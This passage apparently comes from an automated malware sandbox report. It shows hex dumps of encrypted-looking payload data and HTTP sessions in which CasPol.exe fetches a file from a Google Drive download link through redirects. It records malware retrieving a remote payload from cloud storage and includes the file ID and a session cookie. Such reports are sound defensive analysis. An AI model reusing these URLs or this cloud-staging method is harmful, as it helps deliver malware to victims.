9a 69 fb 74 54 2d 3d a7 5a 9b 6f 62 ac e1 2b 96 8f b2 a2 95 6a 56 af c5 59 6e de 02 39 e1 cf 7e d9 76 72 41 9d 8f 96 d6 55 3f 03 44 3b ff ad 54 c6 d2 e8 cc e6 99 58 05 96 1e 72 ff 2a bb
                                                                                    Data Ascii: 5e>5j\MRp7/4nI[VrpYK82\&lAAR"Jq[\On|Z%Dm{PH}jzesgdm8i,~H%z82FwRmnT^a)@js/FB[O<meQ6qitT-=Zob+jVYn9~vrAU?D;TXr*
                                                                                    2021-11-23 13:40:02 UTC191INData Raw: c2 6d 07 0a 04 ab e2 7f fd 39 fa 5b b7 29 55 3e 64 96 e4 be 87 19 8f e6 e7 a2 2d c7 a3 f0 16 32 b0 6d c5 65 32 7a e7 2a 34 c0 07 4c 6e b8 2e e2 a7 6b ee f3 56 db 81 39 af 22 20 e7 0c c3 f4 7f 6b 06 f0 2b 71 af 5c 13 67 4c 6f 64 90 56 05 1f 5f 55 4f c1 c0 e4 54 8b 7a 98 9e 0e 68 6a ff 17 e4 3f 06 41 38 9a fa 1d 1f 97 fd 22 a8 49 a4 88 ce c8 55 5f 1e 89 79 3b 6e 34 57 54 9d 65 38 3f 11 e2 25 22 8a 97 64 2c 50 61 0b dd 83 aa 8a 4a d2 43 3d ad 9f 93 e5 f7 fa 56 06 25 97 d3 99 37 e9 f2 de 34 d6 1c 0d 25 bc 8a 70 d6 64 49 96 01 23 b1 cd 71 f9 cf 83 29 11 bd 6a 1f 89 53 5a 5d ac 0b 8c 7e a6 9f 8c 3c c8 9d 76 84 f5 1d a6 1b 4e 60 62 0d 45 17 10 26 27 9f a9 f2 21 cc 88 75 05 6d 12 49 59 0d bc 65 69 05 11 3c a3 bc 58 7b 09 8e bb 84 c4 82 4d e4 5d 17 da e4 5d b6 c9
                                                                                    Data Ascii: m9[)U>d-2me2z*4Ln.kV9" k+q\gLodV_UOTzhj?A8"IU_y;n4WTe8?%"d,PaJC=V%74%pdI#q)jSZ]~<vN`bE&'!umIYei<X{M]]
                                                                                    2021-11-23 13:40:02 UTC192INData Raw: 02 52 67 83 5b 7d 91 cd 29 ca f7 1a 23 68 65 86 62 f4 da fb b7 b9 ee e5 e7 ab 1e df 43 c1 9f d0 98 80 0b ab 78 11 9c 99 1e 81 c8 54 75 87 76 dd 16 d3 66 55 01 f7 f2 69 1e 6c 05 04 cd 65 d0 4f ae 88 db 23 47 6c bb 1c af 85 a0 be 12 75 5c 21 36 74 1e a8 55 33 1d b1 1f d2 a0 11 b1 f7 f2 df a0 4b 9e d9 2a 81 00 07 27 1f 72 1e 0e 1f 04 8f 29 f0 8e e9 6b 53 99 71 ec 2a 1b b0 3a bb 8e c8 50 7d a5 f1 8e 87 ac 12 b1 e2 41 ad 84 16 3c 48 58 fb 7c a2 b3 68 ee 76 c2 1d 7f d7 82 79 1c d4 79 91 c2 68 d1 bc 2d 61 e2 5c c6 42 bc e3 1b ae ca 07 8f 83 2a 9d 22 1c aa a6 cf 83 c1 0c 1a 8d 13 a6 b7 26 ed d9 cc e2 94 d6 66 3c 16 65 65 dd 6a c6 62 2d 4f 12 bf 47 aa 64 55 83 85 c7 a9 14 a1 1a e3 bd 28 be b8 65 21 31 60 0a 5b cc 55 af c0 00 50 76 3a 6f 1e c4 f0 e9 da 39 79 f5 b5
                                                                                    Data Ascii: Rg[})#hebCxTuvfUileO#Glu\!6tU3K*'r)kSq*:P}A<HX|hvyyh-a\B*"&f<eejb-OGdU(e!1`[UPv:o9y
                                                                                    2021-11-23 13:40:02 UTC193INData Raw: e7 55 e0 11 c8 6a 4b 8b ff 70 de c5 40 ab 53 96 6b 25 98 2a 51 37 6c 4a 6f ac 63 75 14 5c cc 04 34 90 56 3f 80 33 37 9e ce c0 aa d3 d6 cb 8c 5c c7 74 f9 31 8a bf 05 7d 14 74 8a 69 89 75 0d 62 43 77 dc 9f bc 86 a7 06 50 29 97 f4 60 42 e3 3d 97 64 9d 8c 0f 23 5a d0 93 5d 44 22 ce 95 75 58 8c f6 bb f8 32 e7 0e 68 f2 70 8b 25 53 6e 96 89 94 c4 d0 1a f0 ed c9 dc 6f 31 d8 81 9d 78 df 21 02 df 7a 5c 80 87 76 53 6b a0 cc ab 1e e4 45 50 77 3e 3f 6d 6b f9 73 68 45 25 26 16 b3 dc c0 60 53 9d 23 bc 87 ee 23 85 6f 3b 1d 6d f3 a9 04 25 66 cf 3c ba 31 45 7f 1e 7d 34 3c 8a 38 04 7e 09 cb 35 09 36 0e b7 c9 7a 7f 13 f5 1e f7 8c a6 2c 97 73 b2 65 ef 02 b4 8a 56 db 7f 29 25 ab ce 2f ae 0a 5e c8 59 1e a5 75 32 18 fb 67 e1 dc dc 34 9f 44 40 93 73 bb db 85 e5 1f 06 b1 7d f2 bf
                                                                                    Data Ascii: UjKp@Sk%*Q7lJocu\4V?37\t1}tiubCwP)`B=d#Z]D"uX2hp%Sno1x!z\vSkEPw>?mkshE%&`S##o;m%f<1E}4<8~56z,seV)%/^Yu2g4D@s}
                                                                                    2021-11-23 13:40:02 UTC194INData Raw: 0a 61 c0 b4 1b 67 35 da f5 86 e6 24 0f 2d 03 f4 55 cc 41 2c 82 1b 78 1d f7 dc b7 54 6c 41 2d de d7 1a 73 19 19 d2 d8 ca e8 15 e4 a0 ba c3 67 2e e8 8c 70 49 a8 26 f4 06 93 17 63 05 f1 8f c4 91 73 d0 62 f3 c4 1f 88 ac ff 42 f1 81 03 06 16 81 2e e5 34 ef 90 af b6 85 21 a4 29 1d 23 c0 b8 94 00 5a 48 0e e2 09 19 02 7d a4 ce d1 93 2b bb 0e 57 7b 5c 96 88 79 63 2b 64 0b 23 b5 28 3a 8f 52 0c 77 64 05 04 e1 e2 d1 ec 3c 59 bc e1 d5 10 04 ac 98 ae e4 6e 9c a4 78 ad 87 e9 2f 4d e3 d0 b9 ec 71 9b 2f 80 9e 6b 90 fb b3 12 18 6c 09 77 71 3e 2c d6 82 9b 7a 29 78 e3 67 8e 82 7e 5b d9 65 88 8b ce fc a8 d8 42 03 b6 29 4f 31 ea 66 0f 87 c6 aa 61 3d 38 b3 5e 74 e5 46 d6 5f b2 c8 8b 82 a6 fb 7d eb 78 4d 64 e4 5e c7 fd 92 a6 93 0d 07 f9 64 6d 62 f9 7d 7d 6d b5 fb 4c 8c 1d 2f 7a
                                                                                    Data Ascii: ag5$-UA,xTlA-sg.pI&csbB.4!)#ZH}+W{\yc+d#(:Rwd<Ynx/Mq/klwq>,z)xg~[eB)O1fa=8^tF_}xMd^dmb}}mL/z
                                                                                    2021-11-23 13:40:02 UTC196INData Raw: f4 89 97 f2 4a d1 2b 6f 6d 89 a4 f1 c6 33 7f 80 57 da 3e cc 61 9a e6 a7 9a af 1d 33 fe 1d fa 92 59 b2 89 36 b5 22 c9 53 2e ab b1 1a 2d f5 d6 4e ba b4 f2 a1 f8 1b 72 a3 30 df c3 3b f4 ea 2f 59 23 d5 05 71 39 61 45 f7 76 1a bc b0 83 f0 f3 29 1b c4 24 3f e9 db 67 c0 1f 33 5d fd 32 1d e9 d5 a4 aa 2e 1a 6f 6b 99 3f d1 6e 96 24 a6 b3 00 19 15 03 e0 e1 14 47 c5 4b 5b cb 6f 65 7e 3e d2 24 5a fb 46 c5 0b 00 18 55 27 c7 e7 12 8f 34 0e 42 8c 6d fb 1e b1 b9 2d 23 e1 09 7d 80 d9 c5 c3 47 e6 98 8c 3c 95 e1 b6 c5 81 34 a0 66 07 52 28 63 5f 71 71 7e 97 2e ff 6a de 5f f7 77 7c 62 ed 2a 7d 15 7a ad 52 a1 08 ea d0 70 fd ad d4 2f a7 c5 5a cd ef 55 ae bb 4b 84 bf 2e 97 b2 f7 15 a3 b7 66 60 2c af 1f 99 79 05 67 d9 2b 85 c1 c5 22 98 9f f6 cf e2 22 c1 96 0c dd 2b 38 f4 cd 6c 35
                                                                                    Data Ascii: J+om3W>a3Y6"S.-Nr0;/Y#q9aEv)$?g3]2.ok?n$GK[oe~>$ZFU'4Bm-#}G<4fR(c_qq~.j_w|b*}zRp/ZUK.f`,yg+""+8l5
                                                                                    2021-11-23 13:40:02 UTC197INData Raw: d5 dc 51 39 b0 66 41 e1 53 56 51 8b 4f f1 87 18 79 ae 96 f4 21 a8 63 54 24 76 7f 47 31 48 47 9e ed c6 69 91 ce 8f c0 8a aa 8d 6a f3 74 c6 ce cc 82 1a 78 f9 d7 60 7e 5a f8 dc bd ab ad fd 64 b8 4e 7d b2 69 20 5f 93 8b a0 a2 2a a5 5e 48 dd 1f 13 33 37 16 19 07 13 db 6e 0d 2d 6a e1 4f 60 b8 b4 e5 f5 43 54 00 11 30 34 b3 8c 70 9a 23 7e b7 13 c1 aa 70 78 1f f0 d0 d7 b2 af 40 4d 40 3c 62 a9 0a 4b 7a 96 98 82 2d c5 e8 84 17 df 92 e6 a8 44 73 81 02 c7 57 e3 97 d5 7e 24 13 d6 d2 23 b4 e5 86 2b b9 d6 d8 89 33 c3 9d 4c fd f3 c3 d4 25 86 44 a8 fe 1f b3 de 42 93 15 32 26 06 05 e9 9c 86 00 66 89 8e de ba 00 87 c6 7b 60 c7 53 6f c1 8f 6b 15 40 d1 f7 3e fa 9b 13 f1 6a 6e 92 f6 d6 05 2b 85 36 1a 29 49 55 f0 19 33 73 34 d7 91 f3 20 3a 3c c2 d5 19 9f 53 3a 65 8a bd 40 db d1
                                                                                    Data Ascii: Q9fASVQOy!cT$vG1HGijtx`~ZdN}i _*^H37n-jO`CT04p#~px@M@<bKz-DsW~$#+3L%DB2&f{`Sok@>jn+6)IU3s4 :<S:e@
                                                                                    2021-11-23 13:40:02 UTC198INData Raw: 7e 84 d0 23 6b 6f 45 85 7c 6b 39 b9 1d 90 14 b3 29 46 e5 f7 b1 17 10 f8 82 87 27 ec 39 a8 aa 18 62 2f b3 7c cc 95 d7 30 d9 b7 5b dd 33 5a 44 df 18 3e 0e e7 11 30 e7 4a b9 f5 57 c4 de 99 0c 88 66 0e ea 8c 6b 3e 75 50 2b 47 cd a8 b0 8b 79 59 90 ef b5 9c c7 43 b3 5d 65 a8 93 e4 21 8f 8e df 01 f8 a0 0a 00 04 fc ab b0 8e b0 67 95 c0 9e 68 a5 c5 51 b4 9e 94 5c a3 cd 83 41 42 ec 25 75 a6 94 6a d2 22 3a 21 b6 a7 f5 f9 9f 0f 60 61 93 7b bf 65 b4 37 e2 50 fc ca 37 c1 3e 3e f3 6d 14 ed c7 2a 15 2f 3c 05 5b b8 2d 86 87 2a 32 ba a6 be cc e5 bd ac ef 6a eb 64 4c b4 a9 af 4a 41 cd c0 6c 19 69 f1 6e 66 8c e4 32 11 96 77 df 35 d2 b2 e1 6f 05 1c 20 9c ec b9 e3 10 c0 dc f6 87 0d 45 1f a5 0f 6f 33 bd 62 3e c3 62 86 79 f4 fd 75 1e ad 39 1c e5 2a 79 94 c7 40 f3 82 8b c1 73 fa
                                                                                    Data Ascii: ~#koE|k9)F'9b/|0[3ZD>0JWfk>uP+GyYC]e!ghQ\AB%uj":!`a{e7P7>>m*/<[-*2jdLJAlinf2w5o Eo3b>byu9*y@s
                                                                                    2021-11-23 13:40:02 UTC200INData Raw: 57 45 77 3d 76 4f e2 06 30 18 67 f5 28 a4 e0 d4 90 b0 84 27 22 b9 f2 00 5a ca 82 56 e6 7f f2 ff 22 23 10 d6 5e 88 7e f9 ef 5d 41 64 47 ed a9 b6 f5 6c 94 bf 93 43 2d d5 6f 06 3f c0 b4 5a 90 64 84 ca 80 65 ae 7c 88 4d 52 42 1c 8b ca 9b 77 96 b4 26 5d 49 47 c1 98 e9 8d 3c ac 22 4b 29 36 c3 57 9a 53 2b 7e 78 a5 5b ff db 9c 5e ec 80 1b c2 20 a4 3c 1b 51 1d 4d 93 55 d4 e6 78 a9 28 fb e5 c9 80 99 4c 26 ce a4 6f 23 b5 9b da 89 5d 5f e1 64 a5 07 de ad b7 a3 bb 06 df c0 4f 9e 2f 64 2c 64 e9 c9 98 c0 fe aa 7f c5 da 41 c0 7a c5 40 79 a8 00 e8 12 74 f3 34 89 3f 77 47 db 6e c9 fa db 8d 88 aa ae 3a 02 f8 1b 98 4d a6 6c ec 50 6b e6 d4 3b 5c 5e d7 37 38 b1 47 6a 68 2d 93 82 f2 f8 65 75 4c df d8 aa 59 35 5e 00 8d 25 25 c0 01 e7 e6 96 3c 9e cb fe b3 ef 23 37 9c 77 c5 a6 ee
                                                                                    Data Ascii: WEw=vO0g('"ZV"#^~]AdGlC-o?Zde|MRBw&]IG<"K)6WS+~x[^ <QMUx(L&o#]_dO/d,dAz@yt4?wGn:MlPk;\^78Gjh-euLY5^%%<#7w
                                                                                    2021-11-23 13:40:02 UTC201INData Raw: 12 cc aa 9a f9 bc 8e 26 40 75 ed 69 8e 5d ee 50 d5 13 ba 59 6b 02 84 fb 9d 55 0a 09 8c 86 a6 2f 1d a8 1a 07 0a 89 10 63 de 0a ff 79 19 1a b2 b2 28 b2 6e 73 c5 8c 01 6c 88 c3 75 29 48 0f 4b 3a 1c 0d 17 63 68 f1 7e 9d 91 99 e5 a6 a2 40 ea 88 6b e9 94 a7 fa db 5a a4 83 c7 c6 ba f6 d2 61 23 90 80 d9 7c 8d 8f 8f 45 56 36 c7 3e 04 81 a6 82 bc 91 a2 d6 84 97 2b 51 84 da 70 b5 7c 7f 1d f2 55 3f 48 b3 ff 61 a0 27 45 af a7 55 ac ac 90 86 06 f2 55 8d 12 6e 9c f1 5e 59 9f 55 4e 10 1a 6d f2 49 15 1b 89 b6 35 7c 3e 1d 46 aa 8c b9 36 d8 94 16 11 f8 3f a9 b0 13 85 c4 74 80 21 e6 5d ed 13 5a 8d d6 2b 2a 56 b0 b8 bc 0f 51 2d 83 88 92 31 f3 32 60 7a 18 a3 cb a8 66 25 87 3e 70 98 51 69 9c 8e 2c 19 68 23 52 3b a8 c8 66 3e 41 3d 52 cb 56 7f 6f 7c 26 27 fd ce 43 52 38 2c bb 41
                                                                                    Data Ascii: &@ui]PYkU/cy(nslu)HK:ch~@kZa#|EV6>+Qp|U?Ha'EUUn^YUNmI5|>F6?t!]Z+*VQ-12`zf%>pQi,h#R;f>A=RVo|&'CR8,A
                                                                                    2021-11-23 13:40:02 UTC202INData Raw: 50 6e 5d c1 43 fa 82 b2 ba 0c b0 d2 cf ca 88 9b 26 df c1 b3 8c 8f 5b 62 17 b0 55 df 83 b7 c8 c0 12 bf 6d 53 59 b4 8c 6d f8 8b e4 75 0f 53 65 50 1d d9 39 55 be 20 c2 dc 8f 28 ab c5 8f 5d c4 3a 10 a9 3e 98 9b 4e a4 f7 9a 46 11 79 bb 99 b4 ce 13 1a e4 a1 c9 1f c8 e6 b6 c6 ee ff 15 fe 6d ce 52 12 cb f9 f4 7e 32 60 73 e9 bd a1 1f 15 f3 f6 8d d1 ed 70 4f d7 37 15 45 2a 37 9a 56 28 a5 cb 94 db 63 0f 62 f5 d3 69 30 d3 ae 01 92 6a 06 f6 47 df c4 22 56 be 3b 40 d6 82 58 d2 06 cd e8 a3 fa b6 39 c1 4d 1f 23 4b e1 7f a3 5d 37 8f 47 c7 06 f5 ac 54 2e 5f bf 28 ac 9d 0e 19 3d 2c d4 8f 34 8b 81 22 77 86 0b 61 e5 84 e9 6a 15 95 30 fe f6 36 97 71 44 3b 5d 6d 78 1a 7c 0d 48 0f 61 2c 16 2d 57 19 69 cc b1 cf 2e c4 06 15 23 cc 8e 8e 44 0d 38 49 c3 13 3b 5b 26 b2 79 d3 97 4f 2f
                                                                                    Data Ascii: Pn]C&[bUmSYmuSeP9U (]:>NFymR~2`spO7E*7V(cbi0jG"V;@X9M#K]7GT._(=,4"waj06qD;]mx|Ha,-Wi.#D8I;[&yO/
                                                                                    2021-11-23 13:40:02 UTC203INData Raw: 14 70 70 46 5f 6e dd 41 39 39 cd 4e 74 77 83 b6 de 84 10 19 bb 31 c3 22 ac 82 4a c4 23 2b 24 1c a0 1f 2f 65 aa 1a 32 ea ae c9 0c be 56 31 db 01 f1 b3 77 fb 1c 9c d2 90 92 5d eb 10 3f 26 95 26 05 70 8f 06 45 fa 29 03 98 22 27 9c 1b 70 14 10 54 95 fc 1a 62 ad 9e 8f a1 b9 8d be d8 6d 92 62 04 bc 23 03 13 dd df bd bb 2e a4 4a bb 9c 1c e3 33 2b e4 7f e5 f5 4a e3 f6 45 4e 7c e1 d4 97 f0 55 02 52 53 db e7 ee 41 e8 04 e6 d8 ab 5c e4 44 cb 6f b0 0f ff c2 46 7d 55 30 1c 16 7a 2a b0 2f 37 87 43 29 85 89 dc 2c c2 6a 4e 36 fe f1 49 64 d1 92 99 3b d7 b0 48 a1 98 3e fc fe 5b 4a 5d 56 83 b6 fd 8e fe a8 ea 2c a2 ed 80 64 9e 12 e2 0b e7 a3 ec 9c 41 c6 8f c8 0f 1e 2e c6 43 fd 1d c5 7b f9 f4 cf b0 4b 61 34 ff df 21 38 01 dc e3 4e 33 cf e3 c9 08 5d 42 46 9f 4f 97 11 2c b0 80
                                                                                    Data Ascii: ppF_nA99Ntw1"J#+$/e2V1w]?&&pE)"'pTbmb#.J3+JEN|URSA\DoF}U0z*/7C),jN6Id;H>[J]V,dA.C{Ka4!8N3]BFO,
                                                                                    2021-11-23 13:40:02 UTC205INData Raw: b1 3e d9 fe e7 9d 2c 10 36 c7 84 45 46 75 4e 38 73 42 96 28 a0 6a 36 d8 6d 97 bf f0 98 69 ad 72 da b3 c9 bd 5d c4 0a 0c d9 f5 28 ab b4 f1 00 c6 e9 d5 1b 9b 62 32 ba 71 b4 e1 a1 10 2b b5 94 e5 da b6 1e 9c 71 5c 46 3e 4a b9 ce d2 dd 24 47 50 63 a3 86 da bf 33 06 60 79 5b 5c 0b 7e 63 c8 a1 92 ab 6b 1d 68 0e 61 91 cd 36 fa 34 0b 8a 98 ad 3e d4 11 f3 6c 6f 70 dd 7b 8e 76 6b 7f 1a c5 a9 19 61 9c f1 3f 3b e8 99 1d fc f6 14 08 e5 63 fe c7 de de 8e 07 55 dc ef fb 79 93 dc 3e c8 8d 30 e7 1c 9b 3b 31 b0 1d cf 1d 0f 3d 35 b4 13 cc f0 ce be fa 39 0a 43 8c 50 3d 3d ec 54 35 39 ae 2e 0a a8 e7 1f b7 52 25 d1 68 e3 49 2f 13 79 3d fe 75 fd 87 ae 06 ef 1e 5c 1f d9 8f 68 d1 92 1b 83 b0 6d 44 9f a3 11 57 75 a9 71 d7 34 83 8b fe 8a 2e 4a 34 08 fe e3 2d 00 f8 b1 13 d3 f4 73 fc
                                                                                    Data Ascii: >,6EFuN8sB(j6mir](b2q+q\F>J$GPc3`y[\~ckha64>lop{vka?;cUy>0;1=59CP==T59.R%hI/y=u\hmDWuq4.J4-s
                                                                                    2021-11-23 13:40:02 UTC206INData Raw: 41 7b 81 9e 12 fc c3 80 e7 82 0b 8c d2 a6 81 c7 09 05 04 a8 e8 09 6a 67 99 0c c9 f4 be eb 2b 4b 65 e5 03 6e 40 88 d4 0a 5f 71 ee 54 60 87 34 0c 58 84 23 b7 7f e3 cc 4f 42 79 7c 72 bc 61 e9 e1 0d 20 b7 2a 35 14 f5 bb 37 08 bf 6e 4b 26 bc 1e c5 1e de 10 69 a9 1a b8 bf 43 ad b2 7f 9b cb ea 8e 72 f2 b9 cb 43 a8 85 b4 6e 15 81 e6 c8 30 09 a5 a4 ed 83 c9 54 60 b3 76 a1 32 f7 7a 97 fc 7b b0 15 d4 6d 05 11 45 6d aa 5a d2 5e 1e 32 14 7c 78 38 a4 57 73 10 66 c7 d3 0a 72 8d 2c d8 ac b1 9a 9d 1f 9f 02 ac 22 b5 6f 2f 9d 83 0f 0f 30 a4 e3 7c a7 a7 5e ec 58 ef ff ef 6c b8 9a 46 c0 73 b5 c2 bf 40 84 31 27 b4 63 12 88 f2 14 04 62 d0 21 de d6 87 4a f0 c4 e2 aa 5d 09 98 e7 6e 73 21 b4 8b 89 e2 09 92 14 c9 d9 52 4a 8f 4b 27 e2 8c e7 ca 5c 79 7f 69 bf 1f e4 25 dc f5 37 ae 8f
                                                                                    Data Ascii: A{jg+Ken@_qT`4X#OBy|ra *57nK&iCrCn0T`v2z{mEmZ^2|x8Wsfr,"o/0|^XlFs@1'cb!J]ns!RJK'\yi%7
                                                                                    2021-11-23 13:40:02 UTC207INData Raw: d4 99 2c 74 ab 35 3d 12 db d8 e5 7a e9 3d dd 7a 90 dd 1c ba 8d 19 a5 83 92 4d 30 60 e5 2d 69 58 00 98 b2 21 b7 65 ea ce 06 50 36 61 2e 0c 20 94 69 be 71 a4 32 70 77 21 2b 02 55 59 15 d5 5e 38 6d b8 5b ed 7f 80 fe 2c 5b d6 c5 e2 1f 7a 5f 74 16 e1 5a ef 17 bd 5e b2 91 d8 6f 10 e0 e6 73 37 43 9b b9 85 2b f4 0c ba 5a 51 15 15 ce 9a 49 55 6c e5 17 13 3a 38 49 75 a9 b1 2c f8 98 eb 7c 09 6f 26 57 1f df 65 3a 3d 55 45 8f c3 7e 95 df d7 95 90 6d 09 3a d4 67 02 c0 29 07 80 89 83 00 cb 6c 70 cd 06 cb 63 88 c7 51 41 d0 34 ed ee f9 70 01 bd 3d 8e 55 d0 7f 91 46 75 74 c7 c5 89 5a 28 d7 24 4f 59 b3 94 3f 45 bc a6 e5 9c 4e f1 ab 79 89 d6 25 98 96 4f c1 5c 01 f7 21 0a 75 54 4f 54 82 a7 cf f6 72 1f f8 7d d9 10 d5 3a c7 8e 46 77 c0 45 0e 9c a5 a8 08 7e ac 93 ce eb d7 55 5c
                                                                                    Data Ascii: ,t5=z=zM0`-iX!eP6a. iq2pw!+UY^8m[,[z_tZ^os7C+ZQIUl:8Iu,|o&We:=UE~m:g)lpcQA4p=UFutZ($OY?ENy%O\!uTOTr}:FwE~U\
                                                                                    2021-11-23 13:40:02 UTC208INData Raw: 59 89 62 e7 41 20 1d ad 01 a6 40 42 db 9c 23 76 51 2f 4a 89 75 fc 23 31 36 6e 32 8e 86 bb 36 81 8f 43 12 53 5b 55 9b e7 8e 3b 18 1f c6 63 43 2e b3 7a cd 56 e9 ee 0d 24 f0 9a 0e fb 1a 2f 49 21 07 2e 6c c3 e1 75 59 40 b5 a0 4c 51 6a e4 bd 14 3c b8 be 47 5b d2 90 fd 67 4b 24 d4 af e5 d1 db 38 e4 37 c7 5c 43 d9 2b 9d 12 1f ec 72 97 59 f4 be de b8 55 3f a4 31 27 d8 93 ab 68 ec 89 94 95 4e 3e 2e af b0 8a b0 5f 45 ce ed 41 7e 43 c4 cf b0 31 0d 38 01 1d 67 8e 97 e7 08 ad e7 ba 76 cc a7 0e 73 38 f9 fa 5f 72 18 a0 27 4a e9 63 93 f1 7f 2e 33 57 26 47 4d 38 04 71 a6 95 9d 02 69 aa 44 d6 a5 ff 46 87 55 0e 79 4e 81 e5 c2 90 80 2a 0f fc c8 52 24 af 4b 7c f4 b1 47 72 dd 91 d2 a4 0d 1f cf be e4 be 9d 71 7f 80 0e c1 1c e7 b7 72 52 5d ab 13 65 ae ba 9c 39 50 76 1a ec f3 e9
                                                                                    Data Ascii: YbA @B#vQ/Ju#16n26CS[U;cC.zV$/I!.luY@LQj<G[gK$87\C+rYU?1'hN>._EA~C18gvs8_r'Jc.3W&GM8qiDFUyN*R$K|GrqrR]e9Pv


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.11.2049840142.250.186.174443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:42 UTC209OUTGET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    Cookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
                                                                                    2021-11-23 13:42:43 UTC209INHTTP/1.1 302 Moved Temporarily
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Location: https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download
                                                                                    Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                    Content-Security-Policy: script-src 'nonce-hBEhJOtDEhFHSHDuWkGUWg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Server: GSE
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2021-11-23 13:42:43 UTC210INData Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e
                                                                                    Data Ascii: 198<HTML><HEAD><TITLE>
                                                                                    2021-11-23 13:42:43 UTC210INData Raw: 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 33 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 6d 33 6a 39 6e 61 6a 69 65 6a 6e 64 6a 63 6b 30 64 68 76 70 66 66 37 34 32 73 70 6a 6a 37 6f 36 2f 6d 71 66 74 6f 66 34 74 72 36 6b 37 67 69 64 31 33 6b 36 71 36 69 6b 6f 67 66 70 64 31 6b
                                                                                    Data Ascii: Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k
                                                                                    2021-11-23 13:42:43 UTC211INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.11.2049841142.250.185.161443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:43 UTC211OUTGET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-04-3g-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2021-11-23 13:42:43 UTC211INHTTP/1.1 302 Found
                                                                                    X-GUploader-UploadID: ADPycdvmtcLpPgzMQLobUDF-4QNH6PBf0IGwuHRFKjSxq6qIX4PGzBqOALTlEs0H974-IeBBbiOTL33UDaL58w9cmS8
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, 